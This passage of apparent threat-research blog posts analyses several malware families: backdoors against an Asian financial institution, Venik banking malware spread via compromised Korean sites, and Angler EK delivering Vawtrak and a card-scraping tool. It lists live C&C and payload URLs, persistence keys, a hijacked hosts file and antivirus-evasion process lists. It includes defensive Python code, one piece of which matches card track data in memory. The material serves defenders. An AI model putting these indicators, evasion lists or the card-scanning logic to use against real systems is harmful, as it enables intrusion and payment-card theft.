The backdoor listens on port 143 and waits for a client to connect and issue commands. Port 143 is the default port for unencrypted IMAP (Internet Message Access Protocol), the mail protocol used to access email on a remote mail server from a local client.

[Figure: winhost.exe listening port]

It checks whether the user is an administrator. If so, it installs itself as a service and drops a copy at:

  • %ProgramFiles%\Common Files\System\NT\lib\winhost.exe

If the user is not an administrator, it installs itself at the following path and creates an autostart entry in the registry:

  • %USERPROFILE%\System\winhost.exe

Autostart registry entry:

  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: Microsoft Messenger
    • Data: %USERPROFILE%\System\winhost.exe

 

Payload

[Figure: disassembly of the listen routine]

Depending on the attacker's command, it can:

  • Disconnect
  • Get the backdoor's install path
  • List directories or files
  • Print the contents of a text file
  • Execute a program
  • Download a file
  • Get a CMD shell
  • Exit the CMD shell
  • Upload a file
  • Download a file
  • Load a DLL library
  • Free a DLL library
 

nethost.exe

It installs a copy of itself at one of the following locations, depending on whether the user is an administrator:

If the user is an administrator:

  • %ProgramFiles%\common files\system\library\nethost.exe

It installs itself as a service:

  • HKLM\System\CurrentControlSet\Services\ncoglsse
    • DisplayName = Microsoft Wireless Device Service
    • ImagePath = %ProgramFiles%\common files\system\library\nethost.exe

If not an administrator:

  • %USERPROFILE%\system\library\nethost.exe

It creates the following autostart key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: “ncoglsse”
    • Data: %ProgramFiles%\common files\system\library\nethost.exe

After installation, it injects into lsass.exe to stay memory resident and executes its payload from there.

Payload

It downloads from the following URLs:

  • http://hud321.astringer.com/images/log.gif
  • http://grop.waterglue.org/images/logg.gif
  • http://hud.astringer.com/images/log.gif

The downloaded files contain encrypted URLs that the malware uses to reach its C&C. It connects to that URL with an HTTP POST and sends the following information:

  • IP address
  • Language ID
  • Malware version
  • OS version
  • Machine name

It then receives commands from the C&C and can:

  • Collect information about the drives and folders on the PC
  • List files
  • Download files
  • Terminate processes
  • Open a CMD shell

[Figure: nethost.exe file listing and CMD shell routines]

 

Shell64.dll

Shell64_u.dll – Loader Component

The loader component runs as a service, loads the espionage component and makes sure the infection stays intact. The service, including its name, is configured by the malware dropper, which was not known at the time of writing. Strings embedded in the loader suggest the binary is packed with the Dyamar binary protector, but it does not give the impression of being thoroughly protected.

Simple obfuscation introduced through macros and a number of obfuscated strings show an attempt to complicate analysis, but they are easily bypassed. The binary also comes with three dummy exports that carry more of the same obfuscation. Interestingly, it keeps a log file at C:\debug.txt to which debug messages are written, which is rather uncommon for binaries found in the wild.

The ServiceMain function directs execution to one of the exports: ‘LoadFunc’ on Windows versions below 6.0, or ‘win7load’ on 6.0 and above. These exports load the espionage component, running it in a spawned rundll32.exe process with the appropriate parameters. That second-stage binary exports two functions, ‘main’ and ‘lowmain’, which again serve OS versions 6.0 and above and below 6.0, respectively.

[Figure: loader component control flow]

Shell64.dll – Espionage Component

The espionage component has the internal name ‘Server.dll’. It exports the functions ‘main’ and ‘lowmain’, where main serves OS versions 6.0 and above and lowmain serves versions below 6.0. Just like the loader component, this binary creates and maintains the file C:\debug.txt, to which debugging information is written.

During startup, shell64.dll creates a named mutex, ‘Global\\KongQi [TickCount]’, where TickCount is the tick count at the time of infection. The malware also creates a named shared memory view, ‘_kaspersky’, used to exchange runtime information among threads and injected processes. The name is clearly chosen to blend in with a security product.

[Figure: espionage component startup]

During startup the malware gathers information about the infected system and sends it to its remote server. The information includes:

  • Hostname
  • System CPU power
  • OS version
  • Drive geometry for PHYSICALDRIVE0
  • Global memory status
  • Video capture driver description
  • Installed security products based on running processes list

 

Security Product Enumeration

The list of products searched for is long:

  Process name(s)                       Product
  fsav32.exe, MsMpEng.exe               F-Secure
  FPAVServer.exe                        F-PROT
  BullGuardScanner.exe                  BullGuard
  vrmonsvc.exe                          ViRobot
  AYRTSrv.aye                           ALYac
  V3lsvc.exe                            V3Lite
  Kxetray.exe                           King
  KSafeSvc.exe                          King Defender
  TMBMSRV.exe                           Trend
  knsdtray.exe, FilMsg.exe, V3SP.exe    Keniu
  RavMonD.exe                           Rising
  KvMonXP.exe                           JiangMin
  Mcshield.exe                          McAfee
  avgnsx.exe                            NOD32
  AvastSvc.exe                          Avast!
  dwengine.exe                          Dr.Web
  secenter.exe                          BitDefender
  avguard.exe                           Avira
  ccSvcHst.exe                          Norton
  avp.exe                               Kaspersky
  360sd.exe                             360 Antivirus
  360tray.exe                           360 Defender

The product names are the malware's own labels and are not all accurate: MsMpEng.exe is Microsoft's antimalware engine rather than F-Secure, and avgnsx.exe belongs to AVG rather than NOD32.

 

The following firewall products are also enumerated:

  • Norton Personal Firewall        
  • ZoneAlarm                       
  • Comodo Firewall                 
  • eTrust EZ Firewall              
  • F-Secure Internet Security      
  • McAfee Personal Firewall        
  • Outpost Personal Firewall       
  • Panda Internet Seciruty Suite   
  • Panda Anti-Virus/Firewall       
  • BitDefnder/Bull Guard Antivirus
  • Rising Firewall                 
  • 360Safe AntiArp

 

Espionage Capabilities

Once the malware is set up and running, it waits for instructions from the remote servers. Its capabilities are plentiful and all designed to steal data from the infected system. Stolen information is compressed with the deflate algorithm and sent to a remote server. The functions we analyzed are:

  • Video capture through a capture window named CVideoCap, compressing the video with the Windows VCM API (Video Compression Manager)
  • Sound capture from the system's sound input device, i.e. the microphone
  • Stealing data from the current desktop's clipboard, which can yield passwords copied from password managers
  • Capturing screenshots, compressing them and exfiltrating them as a stream
  • A userland keylogger that sets a global Windows hook via SetWindowsHookEx to listen for keyboard events, which are parsed through the Windows IMM API (Input Method Manager); keystrokes are dumped to a file named ‘jpjl.dat’ created in the Windows system directory
  • Clearing the ‘Application’, ‘Security’ and ‘System’ event logs, which is usually done to erase forensic evidence of an intrusion
  • Shutting the system down, which in effect forces a reboot
  • Creating a local user account with the description ‘This user account is used by the Visual Studio .NET Debugger’
  • Downloading files and executing them
  • Executing other binaries from disk
  • Enumerating files and file attributes on the system, modifying and deleting files and directories
  • Enumerating the window names of open applications
  • Enumerating system attributes such as OS version, CPU power, memory and disk capacity, system uptime, number of processors, names of running processes (matched against security products), computer name, user name of the current user and attached drives
  • Enumerating parameters of dial-up connections, such as phone number and device name
  • Enabling Terminal Services and allowing remote connections
  • Popping up message boxes
  • Opening a socket for sending and receiving data
  • Deleting its files and persistence mechanisms from the machine, i.e. uninstalling the service and removing an autorun registry value named ‘MSLiveMessenger’ under [HKLM]\..\CurrentVersion\Run; it is unclear, though, how this value is created in the first place

[Figure: persistence removal routine]

 

Persistence Methods

The binaries are designed to run in the context of a Windows service, which is assumed to be set up by the corresponding dropper. The service name remains unclear, as it too is set by the dropper. The malware does, however, have the capability to inject its payload into remote processes and contains a function to inject into winlogon.exe (on Windows versions prior to 6.0).

 

dllhost.exe

This malware does not do much: it only tries to download from blog.softfix.co.kr:80.

[Figure: dllhost.exe download attempt]

Who’s behind?

The attacker used C&C domains registered in Korea with registration records that look fake. Some of the C&C domains are owned by HugeDomains.com, a company that sells previously owned domains and offers a service that hides registrant information. Based on the strings in the binaries, it is also clear that the author is not a native English speaker.

Whois Records of C&C used

(a, t, r) marks the contact records in which a value appears: administrative, technical and registrant.

bbs.gokickes.com:80, domain.gokickes.com:443 (GoogleUpdate.exe)
  Emails:        dodomonk@mail.com (a, t, r)
  Names:         smith jack (a, t, r)
  Organizations: (none)
  Streets:       seoul, korea (a, t, r)
  Cities:        seoul (a, t, r)
  States:        seoul (a, t, r)
  Postals:       158070 (a, t, r)
  Countries:     KR (a, t, r)
  Phones:        8245896312 (a, t, r)

img.lifesolves.com:8080 (GoogleUpdate.exe)
  Emails:        jimkimteen@mail.com (a, t, r)
  Names:         zhang yunqiang (a, t, r)
  Organizations: (none)
  Streets:       Taiping Road (a, t, r)
  Cities:        seoul (a, t, r)
  States:        seoul (a, t, r)
  Postals:       100-744 (a, t, r)
  Countries:     KR (a, t, r)
  Phones:        82527656289 (a, t, r)

softfix.co.kr (dllhost.exe)
  Registrant                  : gson
  Administrative Contact(AC)  : zhang yunqiang
  AC E-Mail                   : jimkimteen@mail.com
  Registered Date             : 2014. 01. 08.
  Last Updated Date           : 2014. 01. 08.
  Expiration Date             : 2016. 01. 08.
  Publishes                   : N
  Authorized Agency           : Gabia, Inc.(http://www.gabia.co.kr)
  DNSSEC                      : unsigned

diskoco.com (mpsvc.exe)
  Registrant Name: yang qi
  Registrant Organization: yang qi
  Registrant Street: Guancheng District No126
  Registrant City: dong guan
  Registrant State/Province: Guangdong
  Registrant Postal Code: 523000
  Registrant Country: China
  Registrant Phone: +86.0769 89098138
  Registrant Fax: +86.0769 89098200
  Registrant Email: softmoon@mail.com

forum.energymice.com (mslives.exe)
  Registrant Name: Domain Admin
  Registrant Organization: HugeDomains.com
  Registrant Street: 2635 Walnut Street
  Registrant City: Denver
  Registrant State/Province: CO
  Registrant Postal Code: 80205
  Registrant Country: US
  Registrant Phone: +1.303.893.0552
  Registrant Email: domains@hugedomains.com

astringer.com (nethost.exe)
  Registrant Name: Domain Admin / This Domain is For Sale
  Registrant Organization: HugeDomains.com
  Registrant Street: 2635 Walnut Street
  Registrant City: Denver
  Registrant State/Province: CO
  Registrant Postal Code: 80205
  Registrant Country: US
  Registrant Phone: +1.303.893.0552
  Registrant Email: domains@hugedomains.com

waterglue.org (nethost.exe)
  Registrant Name: Registration Private
  Registrant Organization: Domains By Proxy, LLC
  Registrant Street: DomainsByProxy.com, 14747 N Northsight Blvd Suite 111, PMB 309
  Registrant City: Scottsdale
  Registrant State/Province: Arizona
  Registrant Postal Code: 85260
  Registrant Country: US
  Registrant Phone: +1.4806242599
  Registrant Fax: +1.4806242598
  Registrant Email: WATERGLUE.ORG@domainsbyproxy.com


Malware doesn’t need to be advanced to be effective

These malware families are not advanced, and we have seen them before, yet they were able to infiltrate the target and bypass its security. The malware stayed unnoticed for three months, which gave the attacker plenty of time to operate. This shows that malware does not need to be advanced or sophisticated to get through.

AV is still our best defense and blocks the majority of security events. The problem is that there are so many attacks using so many different techniques that no single security solution will stop all of them. That is why we need multiple layers of security solutions, and security people in our respective organizations.

 

Why spear phish?

The initial entry point was a spear-phishing email targeting one of the heads of the company. According to a report from Trend Micro, spear phishing is still the most favored APT attack bait: “APT campaigns frequently make use of spear-phishing tactics because these are essential to get high-ranking targets to open phishing emails.”

It is easy for an attacker to guess the email addresses of people in an organization, especially high-ranking officials whose names are available online. Attackers can readily profile them from whatever information is available online and customize the attack to the target's profile.

As this case shows, attackers go after the weakest point, and more often than not that is the people in the organization. The lesson is that to protect the organization we must also educate and train everyone in it in proper security practices, so that they do not fall for these social engineering attacks.

Special thanks to Marion Marschalek and the rest of the Cyphort Labs team for their help in analysis of this attack.

The post Multiple Malwares used to Target an Asian Financial Institution appeared first on Cyphort.

Infected Korean Website Installs Banking Malware


On September 18, 2015, we saw activity on koreatimes.com in which we captured a malicious binary. Investigating further, we found that this campaign specifically targets Korean sites and Korean banks.

We looked at our logs for this year and found more Korean websites infected:

  • koreatimes.com (Sep. 18, 2015)
  • filehon.com (May 30, 2015)
  • joara.com (May 3, 2015)
  • hometax.go.kr (May 3, 2015)
  • soriaudio.co.kr (April 23, 2015)
  • gomsee.com (March 16, 2015)
  • lottoplay.co.kr (Feb 6, 2015)
  • insight.co.kr (Jan 31, 2015)
  • filecity.co.kr (Jan 23, 2015)
  • nggol.com (Jan 6, 2015)
  • koreamanse.com (Jan 6, 2015)

 

The payload we obtained also specifically targets Korean banks: it modifies the infected system's hosts file to redirect traffic for Korean banking sites to an attacker-controlled server. This lets the attacker serve a phishing website without the user realizing they are on a phishing site. It also targets AhnLab, a popular antivirus product in South Korea, by killing its processes and deleting its files.

[Figure: infection flow]


Website Infection

The following analysis focuses on the infection on koreatimes.com.

The culprit is a JavaScript file named “2013_gnb.js”, an iframe injector that leads to the KaiXin EK landing page.

[Figure: KaiXin iframe redirect]


It exploits the following vulnerabilities:

  • CVE-2014-6332 (IE)
  • CVE-2011-3544 (Java)
  • CVE-2015-0336 (Flash)

We found interesting strings in the Flash file that give an idea of the platform the attacker used to build the exploit and contain references to the attacker. The string “King Lich V”, which is likely the author's signature, was also found in the Flash file; the same string has been found in other attacks involving a Chinese group. The Flash file was packed with DoSWF.

[Figure: strings in the Flash exploit]


Once exploitation succeeds, the payload is executed in one of two ways. On Windows 7 or 8, a PowerShell script is fired that downloads an executable from 199[.]188[.]106[.]161.

[Figure: PowerShell payload]

Otherwise, shellcode is executed that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The PowerShell route is essentially a way to bypass DEP.

The downloaded binary is a banking malware with backdoor capabilities belonging to the Venik family.

 

Backdoor Venik

“Venik” is the Russian word for a besom, or broom, used in Russian bathhouses.

The downloaded binary is actually a dropper which, when executed, installs a DLL in a randomly named folder under C:\ with a random file name, for example “c:\tqcsv\krxxc.rxk”. It executes this DLL as:

  • “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

It creates a mutex (M142.0.137.66:3201) and an autostart registry entry such as:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons to its server by contacting the following URLs:

  • http://142[.]0[.]137[.]68:803
  • http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 on TCP port 3201 and waits for a command from the server. The server can issue a command that starts a remote access service on the infected client.

[Figure: remote access service command]

It also collects files from the %ProgramFiles% folder and mapped drives. It copies them into a randomly named file in C:\ using xcopy and uploads that file to its server over an HTTP session.

[Figure: file collection routine]

It modifies the hosts file (%system32%\drivers\etc\hosts) by adding the following lines, which redirect the user's visits to banking sites to an attacker-controlled site that is actually a phishing site:

142.0.137.199 www.shinhan.com.or
142.0.137.199 search.daum.net
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 openbank.cu.vo.kr
142.0.137.199 www.busanbank.vo.kr
142.0.137.199 www.nonghyup.com.or
142.0.137.199 www.shinhan.ccm
142.0.137.199 www.wooribank.com.or
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.epostbank.go.kr.or
142.0.137.199 www.ibk.co.kr.or
142.0.137.199 www.ibk.vo.kr
142.0.137.199 www.keb.co.kr.or
142.0.137.199 www.kfcc.co.kr.or
142.0.137.199 www.lottirich.co.ir
142.0.137.199 www.nlotto.co.ir
142.0.137.199 www.gmarket.net
142.0.137.199 nate.com
142.0.137.199 www.nate.com
142.0.137.199 daum.com
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.zum.com
142.0.137.199 zum.com
142.0.137.199 naver.com
142.0.137.199 www.nonghyup.com
142.0.137.199 www.naver.com
142.0.137.199
142.0.137.199 www.nate.net
142.0.137.199 hanmail.net
142.0.137.199 www.hanmail.net
142.0.137.199 www.hanacbs.com
142.0.137.199 www.kfcc.co.kr
142.0.137.199 www.kfcc.vo.kr
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.kbstir.com
142.0.137.199 www.nonghuyp.com
142.0.137.199 www.shinhon.com
142.0.137.199 www.wooribank.com
142.0.137.199 www.ibk.co.kr
142.0.137.199 www.epostbenk.go.kr
142.0.137.199 www.keb.co.kr
142.0.137.199 www.citibank.co.kr.or
142.0.137.199 www.citibank.vo.kr
142.0.137.199 www.standardchartered.co.kr.or
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.suhyup-bank.com.or
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.kjbank.com.or
142.0.137.199 www.kjbank.com
142.0.137.199 openbank.cu.co.kr.or
142.0.137.199 openbank.cu.co.kr
142.0.137.199 www.knbank.co.kr.or
142.0.137.199 www.knbank.co.kr
142.0.137.199 www.busanbank.co.kr.or
142.0.137.199 www.busanbank.co.ir
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.suhyup-bank.ccm
142.0.137.199 www.standardchartered.co.kr

                               Hosts file modification

Note that alongside genuine bank and portal hostnames (www.naver.com, www.wooribank.com, www.ibk.co.kr), the list contains many lookalike names, such as .vo.kr in place of .co.kr, .ccm in place of .com, and .com.or or .co.ir suffixes, that would not normally resolve at all; the hosts entries make those names resolve to the phishing server as well.
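A hosts-file hijack like the one above is easy to spot once you know what to look for. The following Python is an added example written for this article, not code from the malware or from Cyphort: it parses hosts-file text, flags every name pinned to a non-loopback address, separates lookalike names from genuine ones using the suffix patterns seen in the list above, and groups the findings by target address. The sample input is a constructed excerpt of the list, and the lookalike patterns and the rules are this example's own assumptions.

```python
import ipaddress
import re
from typing import Dict, List, Set, Tuple

# Constructed excerpt modelled on the hosts file shown above (not the full list).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
142.0.137.199 www.shinhan.com.or
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.wooribank.com
142.0.137.199 www.naver.com
142.0.137.199
"""

# Lookalike suffixes that appear in the list above: .vo.kr for .co.kr, .ccm for
# .com, .co.ir for .co.kr, and a stray .or glued onto a real .com/.kr name.
LOOKALIKE_RE = re.compile(r"(\.vo\.kr|\.ccm|\.co\.ir|\.(?:com|kr)\.or)$", re.IGNORECASE)


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs, skipping comments and blank lines.

    A line with an address but no hostname yields one pair with an empty name,
    so it is not silently dropped (the list above contains exactly such a line).
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for host in fields[1:] or [""]:
            entries.append((fields[0], host))
    return entries


def suspicious_entries(entries: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Flag entries that pin a name to anything other than a loopback address.

    The rules are this example's own assumptions, not taken from the malware:
    loopback/unspecified mappings are normal; every other mapping is reported,
    and a lookalike name gets its own reason because such a name would not
    resolve at all without the hosts entry.
    """
    findings = []
    for ip, host in entries:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((ip, host, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            continue
        if not host:
            findings.append((ip, host, "address with no hostname"))
        elif LOOKALIKE_RE.search(host):
            findings.append((ip, host, "lookalike domain pinned to " + ip))
        else:
            findings.append((ip, host, "real domain pinned to " + ip))
    return findings


def pinned_addresses(findings: List[Tuple[str, str, str]]) -> Dict[str, Set[str]]:
    """Group findings by target address.

    One address collecting many unrelated banks and portals is the signature of
    this hijack and is the value to block and hunt for across other hosts.
    """
    by_ip: Dict[str, Set[str]] = {}
    for ip, host, _reason in findings:
        by_ip.setdefault(ip, set()).add(host)
    return by_ip


if __name__ == "__main__":
    found = suspicious_entries(parse_hosts(SAMPLE_HOSTS))
    for ip, host, reason in found:
        print(f"{ip:15} {host or '<none>':28} {reason}")
    print("pinned addresses:", {ip: len(hosts) for ip, hosts in pinned_addresses(found).items()})
```

On a real fleet the same logic runs over each machine's %SystemRoot%\System32\drivers\etc\hosts; any address that collects more than a handful of third-party names is worth pulling the file for.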

The phishing site asks for sensitive information that is not usually requested during a normal online banking session.

[Figure: phishing site form]

At times it also asks the user to visit other banking sites, which in turn lead to phishing sites. This likely happens when the phishing site does not currently support the user's bank.

[Figure: redirection to a Woori Bank phishing page]

In addition to its attack on Korean services, it tries to disable AhnLab files and processes.

[Figure: AhnLab process termination]


As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

  Sample          MD5                                Packer   Filename
  Venik dropper   c242d641d9432f611360db36f2075f67   UPX      66.exe
  Venik DLL       a6ec0fbe1ad821a3fb527f39e180e378   RLPack   {random}
  Flash exploit   b9a5a00e134fe0df217c01145319b1cb   DoSWF    ad.swf


Credits to Alex Burt for his help in discovery of this  infection.

 

The post Infected Korean Website Installs Banking Malware appeared first on Cyphort.

Psychcentral.com infected with Angler EK: Installs bedep, vawtrak and POS malware


On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com had been compromised and was infecting visitors with drive-by-download malware. We contacted Psych Central as soon as we discovered the infection; as of October 29, their technical team had identified and addressed the problem. Psychcentral[.]com is a leading independent mental health social network and receives about 163,846 unique visitors per day.

The site was infected with an iframe injector that redirects to Angler EK, which uses a Flash exploit targeting a recent vulnerability in Adobe Flash. We found it installing Bedep and Vawtrak. Bedep is known as a notorious ad-fraud malware, and Vawtrak is a banking trojan following in the footsteps of Zeus. We have seen Angler use Bedep as its payload before, but adding Vawtrak to its arsenal is something we had not seen until recently. Moreover, the Vawtrak sample we obtained downloads a new memory-scraping malware that scans process memory for credit card data, which is typical of point-of-sale malware such as the one that hit Target stores.

 

Infection Chain

[Figure: injected iframe]

The iframe injection originates from an ad server script that uses Open AdStream (OAS). The script makes a request to oascentral[.]spineuniverse[.]com, which leads to a function OAS_RICH() responsible for injecting iframes into the web page.

[Figure: ad server script injecting the iframe]

The web page finally leads to the Angler EK landing page on margueriteyellow[.]bitcoininvesting[.]net. It uses a Flash exploit that targets the following vulnerability:

  • CVE-2015-5560, Adobe Flash Player versions prior to 18.0.0.232 on Windows and OS X.

The vulnerability was patched in the 18.0.0.232 Flash update.

[Figure: network activity during infection]


Payloads

We were able to obtain 3 executable payloads from this infection:

  • a2ee0c22d0cbdaa1c8de45c4a487b96a – Bedep
  • 28639b2c93a24ed6d178f3098ca23f2e – Vawtrak
  • a1d1ba04f3cb2cc6372b5986fadb1b9f – POS malware

 

Bedep

As we have seen in the past, Bedep's function is to run ad-fraud campaigns. It usually arrives encrypted over the network to protect itself against traditional IDS/IPS solutions. It resides on the system as a DLL, usually in the %PROGRAMDATA% folder, where it creates a folder named after the machine GUID and drops itself there.

 

Vawtrak

Vawtrak (aka Neverquest) is a rising star among financial trojans. It was first discovered in the wild in 2013. It arrives by several methods: usually via exploit kits, but also as an attachment to spam email or downloaded by macro malware embedded in Microsoft Office documents and spreadsheets.

It employs functions similar to those of Zeus, such as webinjects to collect confidential banking information and API hooking to intercept browser traffic. It also downloads an encrypted configuration containing the URLs it targets for injection.

The configuration also contains a list of download URLs pointing to its additional modules. The sample we obtained had the following download links in its config:

[Figure: Vawtrak config file snapshot]

Samples downloaded from 176[.]99[.]11[.]154 are its additional modules. One interesting URL is http://46[.]30[.]41[.]16/files/970.exe, a downloader for a new RAM-scraping malware akin to those used in typical POS malware, as described in a Cyphort Special Report.

 

Vawtrak resides on the system as a DLL in %PROGRAMDATA%, using random names such as:

  • C:\ProgramData\Nuxbu\Zuzhot.dll

It creates a Run key that uses regsvr32.exe to execute the DLL, e.g.:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    • Value: {FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}
    • Data: regsvr32.exe “C:\ProgramData\Nuxbu\Zuzhot.dll”
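Persistence of this shape, a Run value whose command is regsvr32.exe or rundll32.exe loading a file from a user-writable location, is cheap to hunt for, and the Venik entry in the previous post (rundll32.exe loading “c:\tqcsv\krxxc.rxk”,Start) fits the same pattern. The following Python is an added example for this article, not code from Cyphort or from either malware family: it triages a set of Run values with three heuristics, non-.dll targets, user-writable paths and GUID-style value names. The Run values are constructed from the entries described on this page plus two benign ones, and the heuristics are this example's own assumptions.

```python
import re
from typing import Dict, List

LOLBIN_RE = re.compile(r"(?:^|\\)(regsvr32|rundll32)\.exe\b", re.IGNORECASE)
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
SYSTEM_DIRS = {"windows", "program files", "program files (x86)"}

# Constructed Run values: the Vawtrak and Venik entries described on this page
# plus two benign ones. Value names and benign paths are illustrative.
VAWTRAK_VALUE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{FFCF9B6F-7C01-4D05-9D5E-7F8BDD6E0481}"
VENIK_VALUE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EvtMgr"
RUN_VALUES = {
    VAWTRAK_VALUE: r'regsvr32.exe "C:\ProgramData\Nuxbu\Zuzhot.dll"',
    VENIK_VALUE: r'c:\windows\system32\rundll32.exe "c:\tqcsv\krxxc.rxk",Start',
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth": r"C:\Program Files\Windows Defender\MSASCuiL.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}


def load_path(arguments: str) -> str:
    """Return the file a regsvr32/rundll32 command loads.

    Takes the first quoted or bare token after the host binary and strips the
    ",Export" suffix that rundll32 accepts on a bare path.
    """
    arguments = arguments.strip()
    if arguments.startswith('"'):
        end = arguments.find('"', 1)
        return arguments[1:end] if end > 0 else arguments[1:]
    token = arguments.split()[0] if arguments else ""
    return token.split(",", 1)[0]


def user_writable(path: str) -> bool:
    """Heuristic: is the path somewhere an unprivileged user can write?

    Covers ProgramData, user profiles, %TEMP% and the 'random directory
    straight under the drive root' layout used by the Venik dropper.
    """
    p = path.lower()
    if p.startswith("c:\\programdata\\") or p.startswith("c:\\users\\") or p.startswith("%temp%"):
        return True
    parts = p.split("\\")
    return len(parts) == 3 and parts[1] not in SYSTEM_DIRS


def classify_run_value(value_name: str, command: str) -> List[str]:
    """Return the reasons a Run value looks like DLL-based persistence, or []."""
    m = LOLBIN_RE.search(command)
    if m is None:
        return []
    host = m.group(1).lower()
    target = load_path(command[m.end():])
    reasons = []
    if not target.lower().endswith(".dll"):
        reasons.append(f"{host} loading a non-.dll file: {target}")
    if user_writable(target):
        reasons.append(f"{host} loading from a user-writable location: {target}")
    if GUID_RE.match(value_name.rsplit("\\", 1)[-1]):
        reasons.append("GUID-looking value name")
    return reasons


def triage(run_values: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each suspicious Run value to its reasons; benign values are omitted."""
    results = {}
    for name, command in run_values.items():
        reasons = classify_run_value(name, command)
        if reasons:
            results[name] = reasons
    return results


if __name__ == "__main__":
    for name, reasons in triage(RUN_VALUES).items():
        print(name)
        for reason in reasons:
            print("   -", reason)
```

The input dictionary is what you would get from exporting the HKCU and HKLM Run keys on each host; the point of the heuristics is that neither the random DLL name nor the random folder name needs to be known in advance.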

It downloads its configuration file from:

  • http://ninthclub.com/Work/new/index.php

 

 

RAM scraping malware

Vawtrak downloads and executes “970.exe”, which then downloads a DLL component from 91.234.34.44 over TCP port 30970 and saves it as:

  • %ALLUSERS%\Application Data\{random}.dll

It then downloads an additional file via HTTP GET from:

  • 50.7.143.61/a_p/a_970.exe

and saves it as:

  • %ALLUSERS%\Application Data\taskhost.exe

 

taskhost.exe enumerates every running process and checks its memory for credit card information. For each process it finds, it creates a new thread that searches the process memory for track 1 and track 2 data:

[Figure: process enumeration to scrape credit card data]

It specifically checks for card numbers that start with 3, 4, 5 or 6, which covers brands such as AMEX, Visa, MasterCard, Diners Club and Discover.

[Figure: track 1 and track 2 checks]
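What such a scraper does at the byte level is a pattern sweep over process memory. The following Python is an added example for this article, not code from taskhost.exe: it searches a buffer for track 1 and track 2 patterns, validates each PAN with the Luhn check and applies the same first-digit filter described above. The memory buffer is constructed from publicly known test card numbers, not real data, and the regular expressions are this example's own rendering of the ISO 7813 track formats.

```python
import re
from typing import Dict, List

# Magnetic stripe formats the scraper looks for (ISO/IEC 7813):
#   Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
#   Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^\^?]{2,26})\^(\d{4})[^?]{0,60}\?")
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})\d{0,40}\?")

# First digits the malware accepts (AMEX/Diners 3, Visa 4, MasterCard 5, Discover 6).
ACCEPTED_FIRST_DIGITS = b"3456"


def luhn_ok(pan: bytes) -> bool:
    """Luhn (mod 10) check over an ASCII digit string."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 0x30
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_buffer(buf: bytes) -> List[Dict[str, object]]:
    """Return every track 1/track 2 pattern in buf with validation flags.

    Each hit records the PAN, expiry, offset, whether the PAN passes Luhn and
    whether its first digit is one the malware accepts.
    """
    hits = []
    for track, regex in ((1, TRACK1_RE), (2, TRACK2_RE)):
        for m in regex.finditer(buf):
            pan = m.group(1)
            expiry = m.group(3) if track == 1 else m.group(2)
            hits.append({
                "track": track,
                "pan": pan.decode(),
                "expiry": expiry.decode(),
                "offset": m.start(),
                "luhn": luhn_ok(pan),
                "prefix_ok": pan[:1] in ACCEPTED_FIRST_DIGITS,
            })
    return hits


def credible_hits(buf: bytes) -> List[Dict[str, object]]:
    """Hits that pass both filters, i.e. what the scraper would actually keep."""
    return [h for h in scan_buffer(buf) if h["luhn"] and h["prefix_ok"]]


# Constructed process-memory sample built from public test card numbers
# (4111 1111 1111 1111, 5500 0000 0000 0004) plus two decoys: a PAN that fails
# Luhn and a Luhn-valid PAN with a first digit the malware ignores.
MEMORY_SAMPLE = (
    b"\x00\x01junk\xff" * 8
    + b"%B4111111111111111^DOE/JOHN^25121011234567890?"
    + b"\x00" * 16
    + b";5500000000000004=25121011234567890?"
    + b"more filler\x00\x00"
    + b";4111111111111112=25121011234567890?"
    + b";7000000000000005=2512101?"
)

if __name__ == "__main__":
    for hit in scan_buffer(MEMORY_SAMPLE):
        print(hit)
    print("kept:", [h["pan"] for h in credible_hits(MEMORY_SAMPLE)])
```

The same scan, run by a defender over a POS process's memory, is a quick way to confirm whether card data is actually exposed in clear text; the Luhn check is what keeps the search from drowning in random digit runs.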

 

